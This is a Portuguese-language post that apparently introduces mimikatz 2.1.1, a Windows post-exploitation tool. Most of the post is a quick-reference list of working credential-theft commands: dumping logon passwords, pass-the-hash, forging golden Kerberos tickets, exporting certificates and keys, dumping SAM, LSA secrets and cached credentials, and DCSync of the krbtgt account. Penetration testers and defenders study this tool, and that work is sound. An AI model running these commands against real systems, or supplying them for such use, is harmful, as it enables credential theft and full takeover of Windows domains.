mimikatz 2.1.1 - Uma ferramenta pós-exploração para extrair senhas Plaintexts, Hash, código PIN da memória
Mimikatz é uma ferramenta de pós-exploração escrita por Benjamin Delpy (gentilkiwi). Após a fase de exploração inicial, os atacantes podem querer obter uma posição mais firme no computador / rede. Faz com tanta frequência um conjunto de ferramentas complementares. A Mimikatz é uma tentativa de agrupar algumas das tarefas mais úteis que os atacantes vão querer realizar.
Agora é bem conhecido extrair senhas de plaintexts, hash, código PIN e bilhetes da Kerberos a partir da memória.
mimikatz
também pode executar pass-the-hash, pass-the-ticket ou construir bilhetes Golden .
Uso rápido
sekurlsa
kerberos
cripto
vault & lsadump
log
privilege::debug
sekurlsa
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
cripto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault & lsadump
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local